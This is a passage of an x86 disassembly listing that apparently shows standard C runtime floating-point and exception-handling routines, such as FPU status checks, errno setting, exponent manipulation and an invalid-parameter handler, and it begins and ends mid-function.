		test	byte ptr [ebp+arg_8], 4
		jz	short loc_40FF19
		push	4
		call	sub_410435
		pop	ecx
		and	esi, 0FFFFFFFBh
		jmp	loc_410090
; ---------------------------------------------------------------------------

loc_40FF19:				; CODE XREF: sub_40FED1+30j
					; sub_40FED1+36j
		test	al, bl
		jz	loc_40FFBB
		test	byte ptr [ebp+arg_8], 8
		jz	loc_40FFBB
		push	8
		call	sub_410435
		mov	eax, [ebp+arg_8]
		pop	ecx
		mov	ecx, 0C00h
		and	eax, ecx
		jz	short loc_40FF93
		cmp	eax, 400h
		jz	short loc_40FF7D
		cmp	eax, 800h
		jz	short loc_40FF67
		cmp	eax, ecx
		jnz	short loc_40FFB3
		fldz
		mov	ecx, [ebp+arg_4]
		fcomp	qword ptr [ecx]
		fnstsw	ax
		fld	dbl_4240C8
		test	ah, 5
		jnp	short loc_40FFB1
		jmp	short loc_40FFAF
; ---------------------------------------------------------------------------

loc_40FF67:				; CODE XREF: sub_40FED1+7Aj
		fldz
		mov	ecx, [ebp+arg_4]
		fcomp	qword ptr [ecx]
		fnstsw	ax
		test	ah, 5
		jnp	short loc_40FFA1
		fld	dbl_4240C8
		jmp	short loc_40FFAF
; ---------------------------------------------------------------------------

loc_40FF7D:				; CODE XREF: sub_40FED1+73j
		fldz
		mov	ecx, [ebp+arg_4]
		fcomp	qword ptr [ecx]
		fnstsw	ax
		test	ah, 5
		jp	short loc_40FFA9
		fld	dbl_4240C8
		jmp	short loc_40FFB1
; ---------------------------------------------------------------------------

loc_40FF93:				; CODE XREF: sub_40FED1+6Cj
		fldz
		mov	ecx, [ebp+arg_4]
		fcomp	qword ptr [ecx]
		fnstsw	ax
		test	ah, 5
		jp	short loc_40FFA9

loc_40FFA1:				; CODE XREF: sub_40FED1+A2j
		fld	dbl_4240B8
		jmp	short loc_40FFB1
; ---------------------------------------------------------------------------

loc_40FFA9:				; CODE XREF: sub_40FED1+B8j
					; sub_40FED1+CEj
		fld	dbl_4240B8

loc_40FFAF:				; CODE XREF: sub_40FED1+94j
					; sub_40FED1+AAj
		fchs

loc_40FFB1:				; CODE XREF: sub_40FED1+92j
					; sub_40FED1+C0j ...
		fstp	qword ptr [ecx]

loc_40FFB3:				; CODE XREF: sub_40FED1+7Ej
		and	esi, 0FFFFFFFEh
		jmp	loc_410090
; ---------------------------------------------------------------------------

loc_40FFBB:				; CODE XREF: sub_40FED1+4Aj
					; sub_40FED1+54j
		test	al, 2
		jz	loc_410090
		test	byte ptr [ebp+arg_8], 10h
		jz	loc_410090
		xor	esi, esi
		test	al, 10h
		jz	short loc_40FFD5
		mov	esi, ebx

loc_40FFD5:				; CODE XREF: sub_40FED1+100j
		fldz
		push	edi
		mov	edi, [ebp+arg_4]
		fcomp	qword ptr [edi]
		fnstsw	ax
		test	ah, 44h
		jnp	loc_41007A
		fld	qword ptr [edi]
		lea	eax, [ebp+var_8]
		push	eax		; int
		push	ecx
		push	ecx		; double
		fstp	[esp+28h+var_28]
		call	sub_410348
		mov	ecx, [ebp+var_8]
		fstp	[ebp+var_10]
		add	ecx, 0FFFFFA00h
		add	esp, 0Ch
		cmp	ecx, 0FFFFFBCEh
		jge	short loc_41001C
		fld	[ebp+var_10]
		mov	esi, ebx
		fmul	ds:dbl_41EE28
		jmp	short loc_410070
; ---------------------------------------------------------------------------

loc_41001C:				; CODE XREF: sub_40FED1+13Cj
		fldz
		fcomp	[ebp+var_10]
		fnstsw	ax
		test	ah, 41h
		jnz	short loc_41002C
		mov	edx, ebx
		jmp	short loc_41002E
; ---------------------------------------------------------------------------

loc_41002C:				; CODE XREF: sub_40FED1+155j
		xor	edx, edx

loc_41002E:				; CODE XREF: sub_40FED1+159j
		movzx	eax, byte ptr [ebp+var_10+6]
		and	eax, 0Fh
		or	eax, 10h
		mov	word ptr [ebp+var_10+6], ax
		mov	eax, 0FFFFFC03h
		cmp	ecx, eax
		jge	short loc_410067
		sub	eax, ecx

loc_410047:				; CODE XREF: sub_40FED1+194j
		test	byte ptr [ebp+var_10], bl
		jz	short loc_410052
		test	esi, esi
		jnz	short loc_410052
		mov	esi, ebx

loc_410052:				; CODE XREF: sub_40FED1+179j
					; sub_40FED1+17Dj
		shr	dword ptr [ebp+var_10],	1
		test	byte ptr [ebp+var_10+4], bl
		jz	short loc_410061
		or	dword ptr [ebp+var_10],	80000000h

loc_410061:				; CODE XREF: sub_40FED1+187j
		shr	dword ptr [ebp+var_10+4], 1
		dec	eax
		jnz	short loc_410047

loc_410067:				; CODE XREF: sub_40FED1+172j
		test	edx, edx
		jz	short loc_410073
		fld	[ebp+var_10]
		fchs

loc_410070:				; CODE XREF: sub_40FED1+149j
		fstp	[ebp+var_10]

loc_410073:				; CODE XREF: sub_40FED1+198j
		fld	[ebp+var_10]
		fstp	qword ptr [edi]
		jmp	short loc_41007C
; ---------------------------------------------------------------------------

loc_41007A:				; CODE XREF: sub_40FED1+111j
		mov	esi, ebx

loc_41007C:				; CODE XREF: sub_40FED1+1A7j
		test	esi, esi
		pop	edi
		jz	short loc_410089
		push	10h
		call	sub_410435
		pop	ecx

loc_410089:				; CODE XREF: sub_40FED1+1AEj
		and	[ebp+var_4], 0FFFFFFFDh
		mov	esi, [ebp+var_4]

loc_410090:				; CODE XREF: sub_40FED1+29j
					; sub_40FED1+43j ...
		test	byte ptr [ebp+arg_0], 10h
		jz	short loc_4100A7
		test	byte ptr [ebp+arg_8], 20h
		jz	short loc_4100A7
		push	20h
		call	sub_410435
		pop	ecx
		and	esi, 0FFFFFFEFh

loc_4100A7:				; CODE XREF: sub_40FED1+1C3j
					; sub_40FED1+1C9j
		xor	eax, eax
		test	esi, esi
		pop	esi
		setz	al
		pop	ebx
		leave
		retn
sub_40FED1	endp


; =============== S U B	R O U T	I N E =======================================



sub_4100B2	proc near		; CODE XREF: sub_410107+6Cp
					; sub_410107+91p ...

arg_0		= dword	ptr  4

		mov	eax, [esp+arg_0]
		cmp	eax, 1
		jz	short loc_4100CE
		jle	short locret_4100D9
		cmp	eax, 3
		jg	short locret_4100D9
		call	sub_405B83
		mov	dword ptr [eax], 22h
		retn
; ---------------------------------------------------------------------------

loc_4100CE:				; CODE XREF: sub_4100B2+7j
		call	sub_405B83
		mov	dword ptr [eax], 21h

locret_4100D9:				; CODE XREF: sub_4100B2+9j
					; sub_4100B2+Ej
		retn
sub_4100B2	endp


; =============== S U B	R O U T	I N E =======================================



sub_4100DA	proc near		; CODE XREF: sub_4101F8+55p

arg_0		= byte ptr  4

		mov	al, [esp+arg_0]
		test	al, 20h
		jz	short loc_4100E6
		push	5
		jmp	short loc_4100FC
; ---------------------------------------------------------------------------

loc_4100E6:				; CODE XREF: sub_4100DA+6j
		test	al, 8
		jz	short loc_4100EE
		xor	eax, eax
		inc	eax
		retn
; ---------------------------------------------------------------------------

loc_4100EE:				; CODE XREF: sub_4100DA+Ej
		test	al, 4
		jz	short loc_4100F6
		push	2
		jmp	short loc_4100FC
; ---------------------------------------------------------------------------

loc_4100F6:				; CODE XREF: sub_4100DA+16j
		test	al, 1
		jz	short loc_4100FE
		push	3

loc_4100FC:				; CODE XREF: sub_4100DA+Aj
					; sub_4100DA+1Aj
		pop	eax
		retn
; ---------------------------------------------------------------------------

loc_4100FE:				; CODE XREF: sub_4100DA+1Ej
		movzx	eax, al
		and	eax, 2
		add	eax, eax
		retn
sub_4100DA	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame

; int __cdecl sub_410107(int,int,int,int,int,int,double,int)

sub_410107	proc near		; CODE XREF: sub_4101A5+2Ap
					; sub_4101F8+87p

var_20		= dword	ptr -20h
var_1C		= dword	ptr -1Ch
var_18		= dword	ptr -18h
var_14		= dword	ptr -14h
var_10		= dword	ptr -10h
var_C		= dword	ptr -0Ch
var_8		= qword	ptr -8
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h
arg_C		= dword	ptr  14h
arg_10		= dword	ptr  18h
arg_14		= dword	ptr  1Ch
arg_18		= qword	ptr  20h
arg_20		= dword	ptr  28h

		push	ebp
		mov	ebp, esp
		sub	esp, 20h
		xor	eax, eax

loc_41010F:				; CODE XREF: sub_410107+18j
		mov	ecx, dword_423FD0[eax*8]
		cmp	ecx, [ebp+arg_4]
		jz	short loc_41017F
		inc	eax
		cmp	eax, 1Dh
		jl	short loc_41010F
		xor	eax, eax

loc_410123:				; CODE XREF: sub_410107+7Fj
		test	eax, eax
		mov	[ebp+var_1C], eax
		jz	short loc_410188
		mov	eax, [ebp+arg_8]
		mov	[ebp+var_18], eax
		mov	eax, [ebp+arg_C]
		mov	[ebp+var_14], eax
		mov	eax, [ebp+arg_10]
		mov	[ebp+var_10], eax
		mov	eax, [ebp+arg_14]
		push	esi
		mov	esi, [ebp+arg_0]
		mov	[ebp+var_C], eax
		mov	eax, dword ptr [ebp+arg_18]
		mov	dword ptr [ebp+var_8], eax
		mov	eax, dword ptr [ebp+arg_18+4]
		push	0FFFFh
		push	[ebp+arg_20]
		mov	[ebp+var_20], esi
		mov	dword ptr [ebp+var_8+4], eax
		call	sub_41040E
		lea	eax, [ebp+var_20]
		push	eax
		call	sub_40FAB8
		add	esp, 0Ch
		test	eax, eax
		jnz	short loc_410179
		push	esi
		call	sub_4100B2
		pop	ecx

loc_410179:				; CODE XREF: sub_410107+69j
		fld	[ebp+var_8]
		pop	esi
		leave
		retn
; ---------------------------------------------------------------------------

loc_41017F:				; CODE XREF: sub_410107+12j
		mov	eax, off_423FD4[eax*8]
		jmp	short loc_410123
; ---------------------------------------------------------------------------

loc_410188:				; CODE XREF: sub_410107+21j
		push	0FFFFh
		push	[ebp+arg_20]
		call	sub_41040E
		push	[ebp+arg_0]
		call	sub_4100B2
		fld	[ebp+arg_18]
		add	esp, 0Ch
		leave
		retn
sub_410107	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame

; int __cdecl sub_4101A5(int,double,int)

sub_4101A5	proc near		; CODE XREF: sub_40ACF3+51p

var_1C		= qword	ptr -1Ch
var_14		= qword	ptr -14h
var_C		= qword	ptr -0Ch
arg_0		= dword	ptr  8
arg_4		= qword	ptr  0Ch
arg_C		= dword	ptr  14h

		push	ebp
		mov	ebp, esp
		cmp	dword_423FC0, 0
		jnz	short loc_4101D9
		push	[ebp+arg_C]	; int
		fld	[ebp+arg_4]
		sub	esp, 18h
		fstp	[esp+1Ch+var_C]
		fldz
		fstp	[esp+1Ch+var_14]
		fld	[ebp+arg_4]
		fstp	[esp+1Ch+var_1C]
		push	[ebp+arg_0]	; int
		push	1		; int
		call	sub_410107
		add	esp, 24h
		pop	ebp
		retn
; ---------------------------------------------------------------------------

loc_4101D9:				; CODE XREF: sub_4101A5+Aj
		call	sub_405B83
		push	0FFFFh
		push	[ebp+arg_C]
		mov	dword ptr [eax], 21h
		call	sub_41040E
		fld	[ebp+arg_4]
		pop	ecx
		pop	ecx
		pop	ebp
		retn
sub_4101A5	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame

; int __cdecl sub_4101F8(int,int,double,double,int)

sub_4101F8	proc near		; CODE XREF: sub_40ACF3:loc_40ADB8p

var_9C		= qword	ptr -9Ch
var_94		= qword	ptr -94h
var_8C		= qword	ptr -8Ch
var_84		= dword	ptr -84h
var_80		= byte ptr -80h
var_40		= dword	ptr -40h
var_4		= dword	ptr -4
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= qword	ptr  10h
arg_10		= qword	ptr  18h
arg_18		= dword	ptr  20h

		push	ebp
		mov	ebp, esp
		and	esp, 0FFFFFFF0h
		sub	esp, 80h
		mov	eax, dword_423064
		xor	eax, esp
		mov	[esp+80h+var_4], eax
		push	[ebp+arg_18]
		lea	eax, [ebp+arg_10]
		push	eax
		push	[ebp+arg_0]
		call	sub_40FED1
		add	esp, 0Ch
		test	eax, eax
		jnz	short loc_41024A
		and	[esp+80h+var_40], 0FFFFFFFEh
		push	eax
		lea	eax, [ebp+arg_10]
		push	eax
		lea	eax, [ebp+arg_8]
		push	eax
		push	[ebp+arg_4]
		lea	eax, [ebp+arg_18]
		push	[ebp+arg_0]
		push	eax
		lea	eax, [esp+98h+var_80]
		push	eax
		call	sub_40FBF7
		add	esp, 1Ch

loc_41024A:				; CODE XREF: sub_4101F8+2Bj
		push	[ebp+arg_0]
		call	sub_4100DA
		add	esp, 4
		cmp	dword_423FC0, 0
		jnz	short loc_410289
		test	eax, eax
		jz	short loc_410289
		push	[ebp+arg_18]	; int
		fld	[ebp+arg_10]
		sub	esp, 18h
		fstp	[esp+9Ch+var_8C]
		fldz
		fstp	[esp+9Ch+var_94]
		fld	[ebp+arg_8]
		fstp	[esp+9Ch+var_9C]
		push	[ebp+arg_4]	; int
		push	eax		; int
		call	sub_410107
		add	esp, 24h
		jmp	short loc_4102A3
; ---------------------------------------------------------------------------

loc_410289:				; CODE XREF: sub_4101F8+64j
					; sub_4101F8+68j
		push	eax
		call	sub_4100B2
		mov	[esp+84h+var_84], 0FFFFh
		push	[ebp+arg_18]
		call	sub_41040E
		fld	[ebp+arg_10]
		pop	ecx
		pop	ecx

loc_4102A3:				; CODE XREF: sub_4101F8+8Fj
		mov	ecx, [esp+80h+var_4]
		xor	ecx, esp
		call	sub_402AD0
		mov	esp, ebp
		pop	ebp
		retn
sub_4101F8	endp


; =============== S U B	R O U T	I N E =======================================


; int __cdecl sub_4102B2(double)

sub_4102B2	proc near		; CODE XREF: sub_40ACF3:loc_40AD79p

var_8		= qword	ptr -8
arg_0		= qword	ptr  4

		push	ecx
		push	ecx
		fld	[esp+8+arg_0]
		frndint
		fstp	[esp+8+var_8]
		fld	[esp+8+var_8]
		pop	ecx
		pop	ecx
		retn
sub_4102B2	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame

; int __cdecl sub_4102C3(double,int)

sub_4102C3	proc near		; CODE XREF: sub_410348+79p
					; sub_410348+8Ep

var_8		= qword	ptr -8
arg_0		= qword	ptr  8
arg_8		= dword	ptr  10h

		push	ebp
		mov	ebp, esp
		push	ecx
		push	ecx
		mov	eax, [ebp+arg_8]
		fld	[ebp+arg_0]
		mov	ecx, dword ptr [ebp+arg_0+6]
		fstp	[ebp+var_8]
		add	eax, 3FEh
		shl	eax, 4
		and	ecx, 0FFFF800Fh
		or	eax, ecx
		mov	word ptr [ebp+var_8+6],	ax
		fld	[ebp+var_8]
		leave
		retn
sub_4102C3	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_4102ED	proc near		; CODE XREF: sub_40ACF3+31p

arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch

		push	ebp
		mov	ebp, esp
		xor	edx, edx
		cmp	[ebp+arg_4], 7FF00000h
		jnz	short loc_410305
		cmp	[ebp+arg_0], edx
		jnz	short loc_410318
		xor	eax, eax
		inc	eax
		pop	ebp
		retn
; ---------------------------------------------------------------------------

loc_410305:				; CODE XREF: sub_4102ED+Cj
		cmp	[ebp+arg_4], 0FFF00000h
		jnz	short loc_410318
		cmp	[ebp+arg_0], edx
		jnz	short loc_410318
		push	2

loc_410315:				; CODE XREF: sub_4102ED+3Cj
					; sub_4102ED+55j
		pop	eax
		pop	ebp
		retn
; ---------------------------------------------------------------------------

loc_410318:				; CODE XREF: sub_4102ED+11j
					; sub_4102ED+1Fj ...
		mov	ecx, [ebp+arg_4+2]
		mov	eax, 7FF8h
		and	ecx, eax
		cmp	cx, ax
		jnz	short loc_41032B
		push	3
		jmp	short loc_410315
; ---------------------------------------------------------------------------

loc_41032B:				; CODE XREF: sub_4102ED+38j
		cmp	cx, 7FF0h
		jnz	short loc_410344
		test	[ebp+arg_4], 7FFFFh
		jnz	short loc_410340
		cmp	[ebp+arg_0], edx
		jz	short loc_410344

loc_410340:				; CODE XREF: sub_4102ED+4Cj
		push	4
		jmp	short loc_410315
; ---------------------------------------------------------------------------

loc_410344:				; CODE XREF: sub_4102ED+43j
					; sub_4102ED+51j
		xor	eax, eax
		pop	ebp
		retn
sub_4102ED	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame

; int __cdecl sub_410348(double,int)

sub_410348	proc near		; CODE XREF: sub_40FED1+122p

var_C		= qword	ptr -0Ch
arg_0		= qword	ptr  8
arg_8		= dword	ptr  10h

		push	ebp
		mov	ebp, esp
		fldz
		fcom	[ebp+arg_0]
		fnstsw	ax
		test	ah, 44h
		jp	short loc_41035E
		xor	edx, edx
		jmp	loc_4103F0
; ---------------------------------------------------------------------------

loc_41035E:				; CODE XREF: sub_410348+Dj
		xor	ecx, ecx
		test	word ptr [ebp+arg_0+6],	7FF0h
		jnz	short loc_4103CB
		test	dword ptr [ebp+arg_0+4], 0FFFFFh
		jnz	short loc_410376
		cmp	dword ptr [ebp+arg_0], ecx
		jz	short loc_4103CB

loc_410376:				; CODE XREF: sub_410348+27j
		fcomp	[ebp+arg_0]
		mov	edx, 0FFFFFC03h
		fnstsw	ax
		test	ah, 41h
		jnz	short loc_41038A
		xor	eax, eax
		inc	eax
		jmp	short loc_4103A2
; ---------------------------------------------------------------------------

loc_41038A:				; CODE XREF: sub_410348+3Bj
		xor	eax, eax
		jmp	short loc_4103A2
; ---------------------------------------------------------------------------

loc_41038E:				; CODE XREF: sub_410348+5Ej
		shl	dword ptr [ebp+arg_0+4], 1
		test	dword ptr [ebp+arg_0], 80000000h
		jz	short loc_41039E
		or	dword ptr [ebp+arg_0+4], 1

loc_41039E:				; CODE XREF: sub_410348+50j
		shl	dword ptr [ebp+arg_0], 1
		dec	edx

loc_4103A2:				; CODE XREF: sub_410348+40j
					; sub_410348+44j
		test	byte ptr [ebp+arg_0+6],	10h
		jz	short loc_41038E
		and	word ptr [ebp+arg_0+6],	0FFEFh
		cmp	eax, ecx
		jz	short loc_4103B8
		or	word ptr [ebp+arg_0+6],	8000h

loc_4103B8:				; CODE XREF: sub_410348+68j
		fld	[ebp+arg_0]
		push	ecx		; int
		push	ecx
		push	ecx		; double
		fstp	[esp+0Ch+var_C]
		call	sub_4102C3
		add	esp, 0Ch
		jmp	short loc_4103F0
; ---------------------------------------------------------------------------

loc_4103CB:				; CODE XREF: sub_410348+1Ej
					; sub_410348+2Cj
		push	ecx		; int
		fstp	st
		fld	[ebp+arg_0]
		push	ecx
		push	ecx		; double
		fstp	[esp+0Ch+var_C]
		call	sub_4102C3
		mov	edx, dword ptr [ebp+arg_0+6]
		shr	edx, 4
		and	edx, 7FFh
		add	esp, 0Ch
		sub	edx, 3FEh

loc_4103F0:				; CODE XREF: sub_410348+11j
					; sub_410348+81j
		mov	eax, [ebp+arg_8]
		mov	[eax], edx
		pop	ebp
		retn
sub_410348	endp


; =============== S U B	R O U T	I N E =======================================



sub_4103F7	proc near		; CODE XREF: sub_40FBF7+DCp

var_4		= word ptr -4

		push	ecx
		fstsw	[esp+4+var_4]
		movsx	eax, [esp+4+var_4]
		pop	ecx
		retn
sub_4103F7	endp


; =============== S U B	R O U T	I N E =======================================



sub_410402	proc near		; CODE XREF: sub_40FBF7:loc_40FE0Ap

var_4		= word ptr -4

		push	ecx
		fnstsw	[esp+4+var_4]
		fnclex
		movsx	eax, [esp+4+var_4]
		pop	ecx
		retn
sub_410402	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_41040E	proc near		; CODE XREF: sub_40ACF3+13p
					; sub_40ACF3+5Dp ...

var_4		= dword	ptr -4
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch

		push	ebp
		mov	ebp, esp
		push	ecx
		fstcw	word ptr [ebp+var_4]
		mov	eax, [ebp+arg_4]
		mov	ecx, [ebp+arg_0]
		and	ecx, [ebp+arg_4]
		not	eax
		and	eax, [ebp+var_4]
		or	eax, ecx
		movzx	eax, ax
		mov	[ebp+arg_4], eax
		fldcw	word ptr [ebp+arg_4]
		movsx	eax, word ptr [ebp+var_4]
		leave
		retn
sub_41040E	endp


; =============== S U B	R O U T	I N E =======================================



sub_410435	proc near		; CODE XREF: sub_40FED1+20p
					; sub_40FED1+3Ap ...

var_8		= qword	ptr -8
arg_0		= dword	ptr  4

		push	ecx
		push	ecx
		mov	cl, byte ptr [esp+8+arg_0]
		test	cl, 1
		jz	short loc_41044B
		fld	tbyte_4240E0
		fistp	[esp+8+arg_0]
		wait

loc_41044B:				; CODE XREF: sub_410435+9j
		test	cl, 8
		jz	short loc_410460
		fstsw	ax
		fld	tbyte_4240E0
		fstp	[esp+8+var_8]
		wait
		fstsw	ax

loc_410460:				; CODE XREF: sub_410435+19j
		test	cl, 10h
		jz	short loc_41046F
		fld	tbyte_4240EC
		fstp	[esp+8+var_8]
		wait

loc_41046F:				; CODE XREF: sub_410435+2Ej
		test	cl, 4
		jz	short loc_41047D
		fldz
		fld1
		fdivrp	st(1), st
		fstp	st
		wait

loc_41047D:				; CODE XREF: sub_410435+3Dj
		test	cl, 20h
		jz	short loc_410488
		fldpi
		fstp	[esp+8+var_8]
		wait

loc_410488:				; CODE XREF: sub_410435+4Bj
		pop	ecx
		pop	ecx
		retn
sub_410435	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_41048B	proc near		; CODE XREF: sub_413857+243p

ms_exc		= CPPEH_RECORD ptr -18h
arg_0		= dword	ptr  8

		push	8
		push	offset dword_421C18
		call	__SEH_prolog4
		xor	eax, eax
		cmp	dword_4352E0, eax
		jz	short loc_4104F7
		test	byte ptr [ebp+arg_0], 40h
		jz	short loc_4104EF
		cmp	dword_4240F8, eax
		jz	short loc_4104EF
		mov	[ebp+ms_exc.disabled], eax
		ldmxcsr	[ebp+arg_0]
		jmp	short loc_4104E6
; ---------------------------------------------------------------------------
		mov	eax, [ebp+ms_exc.exc_ptr]
		mov	eax, [eax]
		mov	eax, [eax]
		cmp	eax, 0C0000005h
		jz	short loc_4104D0
		cmp	eax, 0C000001Dh
		jz	short loc_4104D0
		xor	eax, eax
		retn
; ---------------------------------------------------------------------------

loc_4104D0:				; CODE XREF: sub_41048B+39j
					; sub_41048B+40j
		xor	eax, eax
		inc	eax
		retn
; ---------------------------------------------------------------------------
		mov	esp, [ebp+ms_exc.old_esp]
		and	dword_4240F8, 0
		and	[ebp+arg_0], 0FFFFFFBFh
		ldmxcsr	[ebp+arg_0]

loc_4104E6:				; CODE XREF: sub_41048B+2Bj
		mov	[ebp+ms_exc.disabled], 0FFFFFFFEh
		jmp	short loc_4104F7
; ---------------------------------------------------------------------------

loc_4104EF:				; CODE XREF: sub_41048B+1Aj
					; sub_41048B+22j
		and	[ebp+arg_0], 0FFFFFFBFh
		ldmxcsr	[ebp+arg_0]

loc_4104F7:				; CODE XREF: sub_41048B+14j
					; sub_41048B+62j
		call	__SEH_epilog4
		retn
sub_41048B	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_4104FD	proc near		; CODE XREF: sub_41054E+Ap

var_10		= dword	ptr -10h
var_C		= dword	ptr -0Ch
var_8		= dword	ptr -8
var_4		= byte ptr -4
arg_0		= dword	ptr  8
arg_4		= byte ptr  0Ch
arg_8		= dword	ptr  10h
arg_C		= byte ptr  14h

		push	ebp
		mov	ebp, esp
		sub	esp, 10h
		push	[ebp+arg_0]
		lea	ecx, [ebp+var_10]
		call	sub_402ADF
		movzx	eax, [ebp+arg_4]
		mov	ecx, [ebp+var_C]
		mov	dl, [ebp+arg_C]
		test	[ecx+eax+1Dh], dl
		jnz	short loc_41053C
		cmp	[ebp+arg_8], 0
		jz	short loc_410536
		mov	ecx, [ebp+var_10]
		mov	ecx, [ecx+0C8h]
		movzx	eax, word ptr [ecx+eax*2]
		and	eax, [ebp+arg_8]
		jmp	short loc_410538
; ---------------------------------------------------------------------------

loc_410536:				; CODE XREF: sub_4104FD+25j
		xor	eax, eax

loc_410538:				; CODE XREF: sub_4104FD+37j
		test	eax, eax
		jz	short loc_41053F

loc_41053C:				; CODE XREF: sub_4104FD+1Fj
		xor	eax, eax
		inc	eax

loc_41053F:				; CODE XREF: sub_4104FD+3Dj
		cmp	[ebp+var_4], 0
		jz	short locret_41054C
		mov	ecx, [ebp+var_8]
		and	dword ptr [ecx+70h], 0FFFFFFFDh

locret_41054C:				; CODE XREF: sub_4104FD+46j
		leave
		retn
sub_4104FD	endp


; =============== S U B	R O U T	I N E =======================================



sub_41054E	proc near		; CODE XREF: sub_40AF33+3Fp
					; sub_40B06B+53p ...

arg_0		= dword	ptr  4

		push	4
		push	0
		push	[esp+8+arg_0]
		push	0
		call	sub_4104FD
		add	esp, 10h
		retn
sub_41054E	endp


; =============== S U B	R O U T	I N E =======================================



sub_410561	proc near		; CODE XREF: sub_40B4CD+56p
					; sub_40BA48+59p ...

arg_0		= dword	ptr  4

		xor	eax, eax
		inc	eax
		cmp	[esp+arg_0], 0
		jnz	short locret_41056D
		xor	eax, eax

locret_41056D:				; CODE XREF: sub_410561+8j
		retn
sub_410561	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame fpd=2A8h


sub_41056E	proc near		; CODE XREF: sub_40C208:loc_40C236p

var_328		= dword	ptr -328h
var_31C		= dword	ptr -31Ch
var_2D8		= dword	ptr -2D8h
var_2D4		= dword	ptr -2D4h
var_2D0		= dword	ptr -2D0h
var_244		= word ptr -244h
var_240		= word ptr -240h
var_23C		= word ptr -23Ch
var_238		= word ptr -238h
var_234		= dword	ptr -234h
var_230		= dword	ptr -230h
var_22C		= dword	ptr -22Ch
var_228		= dword	ptr -228h
var_224		= dword	ptr -224h
var_220		= dword	ptr -220h
var_21C		= dword	ptr -21Ch
var_218		= dword	ptr -218h
var_214		= word ptr -214h
var_210		= dword	ptr -210h
var_20C		= dword	ptr -20Ch
var_208		= word ptr -208h
var_4		= dword	ptr -4

		push	ebp
		lea	ebp, [esp-2A8h]
		sub	esp, 328h
		mov	eax, dword_423064
		xor	eax, ebp
		mov	[ebp+2A8h+var_4], eax
		test	byte_4240FC, 1
		push	esi
		jz	short loc_41059B
		push	0Ah
		call	sub_409E64
		pop	ecx

loc_41059B:				; CODE XREF: sub_41056E+23j
		call	sub_40E0CC
		test	eax, eax
		jz	short loc_4105AC
		push	16h
		call	sub_40E0D9
		pop	ecx

loc_4105AC:				; CODE XREF: sub_41056E+34j
		test	byte_4240FC, 2
		jz	loc_410659
		mov	[ebp+2A8h+var_220], eax
		mov	[ebp+2A8h+var_224], ecx
		mov	[ebp+2A8h+var_228], edx
		mov	[ebp+2A8h+var_22C], ebx
		mov	[ebp+2A8h+var_230], esi
		mov	[ebp+2A8h+var_234], edi
		mov	[ebp+2A8h+var_208], ss
		mov	[ebp+2A8h+var_214], cs
		mov	[ebp+2A8h+var_238], ds
		mov	[ebp+2A8h+var_23C], es
		mov	[ebp+2A8h+var_240], fs
		mov	[ebp+2A8h+var_244], gs
		pushf
		pop	[ebp+2A8h+var_210]
		mov	esi, [ebp+2ACh]
		lea	eax, [ebp+2ACh]
		mov	[ebp+2A8h+var_20C], eax
		mov	[ebp+2A8h+var_2D0], 10001h
		mov	[ebp+2A8h+var_218], esi
		mov	eax, [eax-4]
		push	50h
		mov	[ebp+2A8h+var_21C], eax
		lea	eax, [ebp+2A8h+var_328]
		push	0
		push	eax
		call	sub_407F20
		lea	eax, [ebp+2A8h+var_328]
		add	esp, 0Ch
		mov	[ebp+2A8h+var_2D8], eax
		lea	eax, [ebp+2A8h+var_2D0]
		push	0
		mov	[ebp+2A8h+var_328], 40000015h
		mov	[ebp+2A8h+var_31C], esi
		mov	[ebp+2A8h+var_2D4], eax
		call	ds:dword_41D19C	; SetUnhandledExceptionFilter
		lea	eax, [ebp+2A8h+var_2D8]
		push	eax
		call	ds:off_41D198

loc_410659:				; CODE XREF: sub_41056E+45j
		push	3
		call	sub_407E9A
		int	3		; Trap to Debugger
sub_41056E	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_410661	proc near		; CODE XREF: sub_40C307+25Ap
					; sub_40C6EC+150p

var_C		= byte ptr -0Ch
var_6		= byte ptr -6
var_4		= dword	ptr -4
arg_0		= dword	ptr  8

		push	ebp
		mov	ebp, esp
		sub	esp, 0Ch
		mov	eax, dword_423064
		xor	eax, ebp
		mov	[ebp+var_4], eax
		push	6
		lea	eax, [ebp+var_C]
		push	eax
		push	1004h
		push	[ebp+arg_0]
		mov	[ebp+var_6], 0
		call	ds:off_41D054
		test	eax, eax
		jnz	short loc_410692
		or	eax, 0FFFFFFFFh
		jmp	short loc_41069C
; ---------------------------------------------------------------------------

loc_410692:				; CODE XREF: sub_410661+2Aj
		lea	eax, [ebp+var_C]
		push	eax
		call	sub_40415A
		pop	ecx

loc_41069C:				; CODE XREF: sub_410661+2Fj
		mov	ecx, [ebp+var_4]
		xor	ecx, ebp
		call	sub_402AD0
		leave
		retn
sub_410661	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_4106A8	proc near		; CODE XREF: sub_40C307+285p
					; sub_40C307+336p ...

var_34		= dword	ptr -34h
var_30		= dword	ptr -30h
var_2C		= dword	ptr -2Ch
var_28		= dword	ptr -28h
var_24		= dword	ptr -24h
var_20		= dword	ptr -20h
var_1C		= dword	ptr -1Ch
var_18		= dword	ptr -18h
var_4		= dword	ptr -4
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h
arg_C		= dword	ptr  14h
arg_10		= dword	ptr  18h
arg_14		= dword	ptr  1Ch

		push	ebp
		mov	ebp, esp
		sub	esp, 34h
		mov	eax, dword_423064
		xor	eax, ebp
		mov	[ebp+var_4], eax
		mov	eax, [ebp+arg_8]
		mov	ecx, [ebp+arg_10]
		mov	[ebp+var_28], eax
		mov	eax, [ebp+arg_C]
